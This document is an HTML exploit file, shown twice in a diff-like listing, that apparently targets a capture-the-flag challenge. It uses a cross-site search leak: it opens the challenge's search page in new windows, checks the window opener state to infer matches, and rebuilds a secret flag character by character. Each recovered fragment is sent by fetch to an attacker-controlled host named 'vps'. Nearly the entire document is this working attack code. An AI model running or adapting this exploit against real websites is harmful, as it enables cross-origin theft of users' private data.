omakmoh · November 8, 2022 01:17
diff --git a/exploit.html b/exploit.html
 <html>
 <head>
    <title>omakmoh's leaker</title>
 </head>
 <h1>LEAK ME PLS</h1>



 <script type="text/javascript">

 var leakWindow;

 function send(data) {
    fetch('http://vps/?flag='+encodeURIComponent(data)).catch(err => 1)
  }


 async function sleep(milliseconds) {  
    return new Promise(resolve => setTimeout(resolve, milliseconds));  
 }  

 async function leak(query){


    leakWindow = window.open("http://challenge/search?query="+query);
    await sleep(300)
  // check if the window is in opened or closed state
  var isclosed = leakWindow.opener; // false // https://developer.mozilla.org/en-US/docs/Web/API/Window/closed
  if (isclosed){
    return "NOT CLOSED";
  }
    else{
        return "CLOSED";
  }
 }


 async function leakFlag(){
    var charest = "ablAFGL{}"
    var known = "F"
    for (var counter=0; counter<20;counter++){
        for(let char of charest){
            var ifin = await leak(known+char)
            if (ifin == "CLOSED"){
                known += char;
                console.log(known);
                send(known)


            }



        }


    }




 }

 async function leakCharest(){

 let charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()?@[\\]^_`{}~'.split('')
 let newCharset = ''
 for(let char of charset) {
    const ifin = await leak(char)
  if (ifin == "CLOSED") {
      newCharset += char;
      console.log(newCharset);
      send(newCharset)
 }
 }}

 //leakCharest();
 leakFlag();
 </script>


 </html>
	<html>
	<head>
	<title>omakmoh's leaker</title>
	</head>
	<h1>LEAK ME PLS</h1>



	<script type="text/javascript">

	var leakWindow;

	function send(data) {
	fetch('http://vps/?flag='+encodeURIComponent(data)).catch(err => 1)
	}


	async function sleep(milliseconds) {
	return new Promise(resolve => setTimeout(resolve, milliseconds));
	}

	async function leak(query){


	leakWindow = window.open("http://challenge/search?query="+query);
	await sleep(300)
	// check if the window is in opened or closed state
	var isclosed = leakWindow.opener; // false // https://developer.mozilla.org/en-US/docs/Web/API/Window/closed
	if (isclosed){
	return "NOT CLOSED";
	}
	else{
	return "CLOSED";
	}
	}


	async function leakFlag(){
	var charest = "ablAFGL{}"
	var known = "F"
	for (var counter=0; counter<20;counter++){
	for(let char of charest){
	var ifin = await leak(known+char)
	if (ifin == "CLOSED"){
	known += char;
	console.log(known);
	send(known)


	}



	}


	}




	}

	async function leakCharest(){

	let charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()?@[\\]^_`{}~'.split('')
	let newCharset = ''
	for(let char of charset) {
	const ifin = await leak(char)
	if (ifin == "CLOSED") {
	newCharset += char;
	console.log(newCharset);
	send(newCharset)
	}
	}}

	//leakCharest();
	leakFlag();
	</script>


	</html>